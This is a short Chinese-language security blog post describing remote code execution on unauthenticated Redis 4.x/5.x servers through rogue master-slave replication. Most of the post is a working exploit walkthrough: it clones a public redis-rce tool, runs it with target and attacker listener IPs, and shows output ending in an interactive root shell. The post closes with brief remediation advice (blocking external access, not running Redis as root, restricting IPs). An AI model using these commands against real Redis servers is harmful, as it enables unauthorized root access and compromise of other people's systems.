关注我们

Redis未授权通过主从复制 GetShell[Exp]

LzersLzers 安全文摘 2019-07-10 77399 0

脆弱目标查询

漏洞关键词redis 默认端口6379,影响版本 4.x/5.x

Redis未授权通过主从复制 GetShell[Exp]

Exp利用

攻击机Ubuntu,ip地址192.168.1.107,下载exp脚本,然后输入参数开始。

git close https://github.com/Ridter/redis-rce
 cd redis-rce
 greekn@greekn:~/redis-rce$ python3 redis-rce.py -r 192.168.1.16 -L 192.168.1.107 -f exp_lin.so
 
 █▄▄▄▄ ▄███▄   ██▄   ▄█    ▄▄▄▄▄       █▄▄▄▄ ▄█▄    ▄███▄   
 █  ▄▀ █▀   ▀  █  █  ██   █     ▀▄     █  ▄▀ █▀ ▀▄  █▀   ▀  
 █▀▀▌  ██▄▄    █   █ ██ ▄  ▀▀▀▀▄       █▀▀▌  █   ▀  ██▄▄    
 █  █  █▄   ▄▀ █  █  ▐█  ▀▄▄▄▄▀        █  █  █▄  ▄▀ █▄   ▄▀ 
   █   ▀███▀   ███▀   ▐                  █   ▀███▀  ▀███▀   
 ▀                                     ▀                   
[*] Connecting to  192.168.1.16:6379...
[*] Sending SLAVEOF command to server
[+] Accepted connection from 192.168.1.16:6379
[*] Setting filename
[+] Accepted connection from 192.168.1.16:6379
[*] Start listening on 192.168.1.107:21000
[*] Tring to run payload
[+] Accepted connection from 192.168.1.16:38875
[*] Closing rogue server...
[+] What do u want ? [i]nteractive shell or [r]everse shell: i
[+] Interactive shell open , use "exit" to exit...
$ whoami
root
$

本次受影响版本

Redis 2.x 3.x 4.x 5.x

修复建议

禁止外部访问redis服务端口

禁止root权限启动redis服务

限制链接redis服务的IP

版权声明

本文仅代表作者观点,不代表黑白网立场。
如文章侵犯了您的权利,请通过邮箱联系我们删除。
详情查看:版权纠纷
E-Mail:server@heibai.org

喜欢0发布评论

评论列表

发表评论

  • 昵称(必填)
  • 邮箱
  • 网址